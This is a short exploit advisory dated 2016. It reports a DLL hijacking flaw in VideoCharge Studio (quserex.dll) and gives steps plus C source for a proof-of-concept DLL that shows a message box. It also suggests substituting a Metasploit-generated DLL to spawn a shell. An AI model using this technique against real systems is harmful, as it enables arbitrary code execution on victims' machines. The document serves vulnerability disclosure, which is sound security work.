VideoCharge Studio suffers from a DLL hijacking vulnerability.
1e836755b711a0b91fabb7ee064fa9c854ec157c63a0c2254ac4530dd2b6bd3b
# Exploit Title: VideoCharge Studio DLL Hijacking Exploit (quserex.dll )
# Date: 13-09-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage:http://www.videocharge.com/
# Software Link:
http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Tested on:Windows 7
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
Vuln DLL: quserex.dll
vcstudio.exe will search for an load any DLL named "quserex.dll".
If an attacker can place the DLL in a location
where victim open vcstudio.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
# Exploit:
1- Save and compile below C code as 'quserex.dll' to create vuln DLL
2- Place 'quserex.dll' on Same Directory of vcstudio.exe
3- Open vcstudio.exe
//gcc test.c -o quserex.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################################
Discovered By : Amir.ght #######
#################################